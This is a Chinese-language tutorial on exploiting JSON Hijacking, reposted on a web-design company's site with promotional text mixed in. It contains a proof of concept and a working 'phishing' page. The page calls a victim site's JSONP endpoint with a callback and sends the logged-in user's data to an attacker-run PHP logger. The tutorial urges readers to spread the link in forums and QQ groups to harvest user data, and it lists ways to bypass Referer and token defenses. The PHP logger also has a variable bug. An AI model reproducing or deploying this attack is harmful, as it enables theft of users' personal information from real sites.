這篇文章將為大家詳細講解有關(guān)如何進行JSON Hijacking實戰(zhàn)利用，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

10多年的烏恰網(wǎng)站建設經(jīng)驗，針對設計、前端、開發(fā)、售后、文案、推廣等六對一服務，響應快，48小時及時工作處理。網(wǎng)絡營銷推廣的優(yōu)勢是能夠根據(jù)用戶設備顯示端的尺寸不同，自動調(diào)整烏恰建站的顯示方式，使網(wǎng)站能夠適用不同顯示終端，在瀏覽器中調(diào)整網(wǎng)站的寬度，無論在任何一種瀏覽器上瀏覽網(wǎng)站，都能展現(xiàn)優(yōu)雅布局與設計，從而大程度地提升瀏覽體驗。創(chuàng)新互聯(lián)建站從事“烏恰網(wǎng)站設計”,“烏恰網(wǎng)站推廣”以來，每個客戶項目都認真落實執(zhí)行。

前言

JSON Hijacking漏洞的詳細利用，有點類似與CSRF，不過原理利用方式不同，在這邊文章我著重講解json跨域劫持的利用環(huán)境搭建與方式。

0×01漏洞的挖掘

一般挖掘的過程中，burpsuite代理的History做尋找，過濾多余不可能存在漏洞的一些鏈接，如下圖所示：

我們在返回包中json格式發(fā)現(xiàn)了如下的敏感信息（用戶Id，用戶名，用戶手機號碼）。

0×02漏洞的證明之poc

提交漏洞，poc在眾測時要爭分奪秒，所以這邊用了最精簡的一個POC。

假如返回的數(shù)據(jù)為：

txf({"data":{"name":"唐曉峰"}});    

<html>
<head>
<script>
function txf(a){
alert(a.data.name);
}
</script>

<script src=http://***.***.**/wm/User/getUserInfo?callback=txf></script>
</body>
</html>

即可如下彈窗：

0×03漏洞的利用之釣魚

1.準備一臺web服務器，我直接phpstudy搭的。

附上服務器端的代碼

json.php

<?php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "名字:  ".$name."\r\n");
?><html>

釣魚.html

<head>
    <title>txf</title>
<script>
	var xmlhttp;
    function txf(a)
    {
    xmlhttp=new XMLHttpRequest()
	var x="http://***.***.***/json.php?name="+a.data.name;
	xmlhttp.open("GET", x, true);
	xmlhttp.send();
	}
</script>>
<script src=http://***.***.***?callback=txf></script>
</head>
<body>
	<textarea>釣魚啦，傻瓜</textarea>>
</body>
</html>

把釣魚鏈接http://***.***.***/釣魚.html發(fā)給該網(wǎng)站已登陸的用戶，如論壇，社區(qū)QQ群，社區(qū)貼吧等，服務端即可獲取到大量用戶敏感數(shù)據(jù)。

這邊以hackone的一個項目為例：   

0×04漏洞的修復與繞過

因為這個例子是小伙伴發(fā)過來的還沒修復，所以都脫敏了，我們再從開發(fā)修復的角度去思考如何繞過修復。

1.Referer白名單

子域名繞過，文件名繞過，空Referer繞過

2.增加token認證

token足夠復雜或者服務端加密，我們無法繞過，如果token很簡單，如純數(shù)字，我們可以嘗試遍歷繞過

3.接口禁用

無敵的操作，無法繞過

關(guān)于如何進行JSON Hijacking實戰(zhàn)利用就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。

分享名稱：如何進行JSONHijacking實戰(zhàn)利用
瀏覽路徑：http://chinadenli.net/article38/jijssp.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供定制開發(fā)、用戶體驗、域名注冊、商城網(wǎng)站、網(wǎng)站導航、微信小程序

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)